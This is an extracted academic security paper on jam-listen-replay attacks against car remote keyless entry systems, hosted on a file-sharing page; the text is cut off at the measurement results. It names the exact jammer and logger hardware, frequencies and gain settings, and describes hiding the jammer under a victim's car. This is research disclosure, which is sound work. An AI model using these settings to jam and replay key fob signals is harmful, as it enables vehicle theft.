CarHacking.pdf

(464 KB) Pobierz

Key Is In The Air:

Hacking Remote Keyless Entry Systems

Omar Adel Ibrahim

, Ahmed Mohamed Hussain

Gabriele Oligeri

, and Roberto Di Pietro

College of Science and Engineering,

Hamad Bin Khalifa University,

Doha - Qatar

Electrical Engineering Department,

Qatar University,

Doha - Qatar

Abstract.

A Remote Keyless Systems (RKS) is an electronic lock that

controls access to a building or a vehicle without using a traditional

mechanical key. Although RKS have become more and more robust over

time, in this paper we show that speciﬁcally designed attack strategies

are still eﬀective against them. In particular, we show how RKS can be

exploited to eﬃciently hijack cars’ locks.

Our new attack strategy—inspired to a previously introduced strategy

named

jam-listen-replay—only

requires a jammer and a signal logger.

We prove the eﬀectiveness of our attack against six diﬀerent car models.

The attack is successful in all of the tested cases, and for a wide range

of system parameters. We further compare our solution against state

of the art attacks, showing that the discovered vulnerabilities enhance

over past attacks, and conclude that RKS solutions cannot be considered

secure—hence calling for further research on the topic.

Introduction

Remote Keyless Systems (RKS) are a critical component of modern car security.

Such systems allow the user to lock/unlock the car without resorting to any

mechanical key but only by clicking a button on the car’s fob or even by getting

close to the car itself. RKS mainly implements a request-response protocol be-

tween the fob and the car’s radio transceiver with minimal security protection [3].

During the years, several security ﬂaws have been identiﬁed and RKS evolved

mitigating such attacks. An interesting example is the so-called

rolling codes

that prevent an eavesdropper to reuse a code sequence from the past. At each

transmission, a new code is generated invalidating the old one by resorting to

hash function computations. Unfortunately, rolling codes do not protect against

either

proxy attacks

jam-listen-replay

attacks [11]. The ﬁrst class of attacks

involve to proxy the code sequence from a further distance to the car without the

user consent. This is a classical attack that is played as follows: a user, leaving

the fob unattended, allows an adversary to activate the fob (without stealing

it, just pressing the button) and to proxy the fob emitted code sequence to the

car leveraging another radio technology such as WiFi, Bluetooth or GSM. Proxy

attacks can be mitigated using distance bounding and proximity solutions [12].

Nevertheless, jam-listen-replay attacks are still an open issue due to the diﬃculty

of mitigating jamming attacks. Indeed, the adversary prevents the reception of

the code sequence by jamming the car radio transceiver, and at the same time,

he logs it for the future hijacking of the car.

Contribution.

This paper pushes further the analysis of the jam-listen-replay

attack proposed in [11]. We propose an improved attack scenario by exploit-

ing cheap hardware and commonly available Linux tools. We show the results

of a real measurement campaign highlighting the eﬀectiveness of the proposed

attacks and comparing it against the ones introduced by [11]. We observe how,

given the current state of the art, these types of attacks cannot be solved without

resorting to novel authentication mechanisms, hence justifying further research

eﬀorts by both industry an academia on this topic.

Roadmap.

Next section reviews RKS security state of the art. Section 3 details

the attack scenario; Section 4 introduces the adopted equipment and its con-

ﬁguration, while Section 5 reports on our measurement campaign and discuss

the diﬀerences of our attack with respect to the state-of-the-art. Finally, some

concluding remarks are presented in Section 6.

Related work

A major family of attacks exploits jamming and two subsequent phases: prevent-

ing the delivery of the message to the car (by jamming) and recording the trans-

mitted message for the subsequent re-transmission. An early contribution has

been provided by [11]. Authors ﬁrstly propose an eﬃcient brute-force technique

for hacking garage doors remote controllers. Secondly, they introduce RollJam, a

combined jamming and radio-recording technique enabling the adversary to hack

the communications between the car and its associated fob. RollJam involves

very cheap devices such as Teensy 3.1 and two CC1101 transceivers. RollJam

works by preventing one or more messages to be delivered to the car from the

fob while recording them. Eventually, RollJam allows the user to get in the car

but a sequence of valid messages have been stolen and they can be reused later

on for opening the car.

Authors in [5], and subsequently in [4], revised the jamming-based attack

considering pulse electromagnetic interference despite of continuous interference.

They analyzed the eﬀects of pulsed interference on envelope detectors through

both simulations and measurements. They also suggested an improved receiver

design based on synchronous transmitter-receiver communications, which turn

out to be more robust against pulsed interference.

Authors in [10] demonstrated the relay attack on Passive Key-less Entry Sys-

tems (PKES) used in modern cars. They set up two low-cost and powerful attack

scenarios, using wireless and wired physical layer relays enabling the adversary

to open the car and start the engine by relaying the messages between the key

and the car.

A general overview describing several techniques of potential attacks against

passive entry systems is introduced in [3]. Authors proposed a solution to protect

the vehicle from such attacks by exploiting the diﬀerence in power levels of the

received bits.

Scenario

Our attack scenario involves three entities: the

car,

the car’s owner (user ) and

the

adversary

who wants to steal the user’s car. The adversary implements his

strategy in 3 subsequent steps as depicted in Fig. 1: (i)

set-up,

(ii)

jamming and

recording,

and (iii)

hijacking.

Fig. 1.

The attack is performed in a sequence of 3 steps: (a) Jammer set-up and acti-

vation, (b) Jamming the communication between the user and the car and forcing the

user to use the mechanical key, and ﬁnally (c) when the user leaves the car unattended,

the adversary hijacks the car.

Set-up.

This is a preliminary phase that is performed by the adversary

when the car is left unattended by the user. Indeed, the adversary has to install

a jammer on the car. As it will be clear in the following, the jammer is a very

portable device mainly constituted by a Raspberry Pi v3 (RPiv3) connected to

a HackRF One, a very cheap and ready to be deployed Software Deﬁned Radio

(SDR). The overall equipment can be hidden in several places outside of the car,

e.g., by using a magnet under the car platform.

Jamming and recording.

The equipment should be activated after its in-

stallation and it will prevent the communication between the fob and the car by

jamming a speciﬁc frequency. Since the user will not be able to open the car by

using the fob, after several attempts, he will resort to the mechanical key. Con-

versely, the adversary will record one or more code sequences transmitted by the

fob (and never received by the car) by eavesdropping the fob-car communication

channel.

Hijacking.

The car’s owner will eventually drive the car away and close it

still using the mechanical key. We recall that a jammer is installed on the car

preventing the fob to control the lock mechanism of the car. Subsequently, the

adversary will perform his attack by replaying one of the previously recorded

code sequences, and allow him to hijack the car.

The only unknown parameter to the previous procedure is the communication

frequency adopted by the car brand. The adversary can easily discriminate it

by running a discovering session sensing fractions of the radio spectrum. Our

experiments show that the majority of the cars we used adopts a frequency

band close to 433MHz.

Equipment: Hardware, Software and Set-up

conﬁguration

Our system consists of 2 components: the

Jammer

and the code sequence

Log-

ger.

4.1

Jammer

We implemented a mobile jammer by connecting a Raspberry Pi v3 to a HackRF

One and a power bank as depicted in Fig.2.

HackRF One:

HackRF One is an open source, half-duplex Software Deﬁned

Radio device developed by Great Scott Gadgets and has the capability to receive

or transmit radio signals starting from 1 MHz to 6 GHz.

ANT500 Antenna:

ANT500 is a general purpose, telescopic antenna de-

veloped by Great Scott Gadgets and is designed to operate in the range from 75

MHz up to 1 GHz. Its length is conﬁgurable starting from 20 cm up to 88 cm.

Raspberry Pi v3:

We installed GNU Radio on the RPiv3 and exploited

the Python SDK to control the Hack RF One. The result is a script to transmit

white Gaussian noise on a target frequency.

Power-bank:

We adopted a generic power bank of 5000mA guaranteeing a

long lasting life to our system (about half a day).

Fig. 2.

The Jammer: An RPiv3 controls the HackRF One transmitting white Gaussian

noise at the frequency of 434MHz. The power bank guarantees half a day of jamming

activity.

Finally, we exploited the embedded WiFi in the RPiv3 to access it through

SSH, changing the various jamming parameters and switching it on and oﬀ. We

observe that the jamming frequency (433MHz) is far away from that one used by

the WiFi (2.4GHz), and therefore, the jammer can be remotely controlled. We

set all the gains for the HackRF One platform to 40dB, i.e., radio band (RF),

intermediate band (IF) and base band (BB) gain. Finally, we set the sampling

rate (sps) to 2M as an empirical trade-oﬀ to jam the fob-car communication

without disturbing any other communications in the neighborhood.

4.2

Logger

The logger is mainly constituted by a mobile platform able to log the code

sequence transmitted by the fob to the car. We adopted the following set-up:

Laptop:

We conﬁgured a laptop with a Linux Ubuntu distribution and GNU

Radio Companion.

HackRF One and ANT500 Antenna:

A HackRF One has been connected to

the above laptop to record all the code signals transmitted in the neighborhood.

Figure 3 resumes our logger setup and the main connections.

Fig. 3.

The Logger: a laptop equipped with Ubuntu and GNURadio Companion is

used to receive and log the code sequence transmitted by the fob.

We considered the following conﬁguration for the SDR: frequency 434MHz,

sampling rate 2M (sps), RF Gain 10dB, IF Gain 20 dB, and BB Gain 20 dB. We

observe that the gains ﬁgures adopted by the logger are signiﬁcantly diﬀerent

from that one used by the jammer. Indeed, the logger has to mitigate the noise

power from the jammer in order to decode the code sequence transmitted by

the fob. The above values are the result of several trials and they take also into

account the relative distances between the jammer, the fob and the logger.

Measurement results

We performed several measurements in the parking of our university (College of

Science and Engineering - Hamad Bin Khalifa University, Doha, Qatar) during

Plik z chomika:

Intiale

Inne pliki z tego folderu:

Mini Cooper Oil Leak Repairs -R56N14-(1).mp4 (392968 KB)
FAP-52-v1.52_sign.apk (2628 KB)
FAP CITROEN-PEUGEOTv.1.37 FULL UNLOCK.apk (1813 KB)
lewa.jpg (193 KB)
prawa.jpg (197 KB)

CarHacking.pdf

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: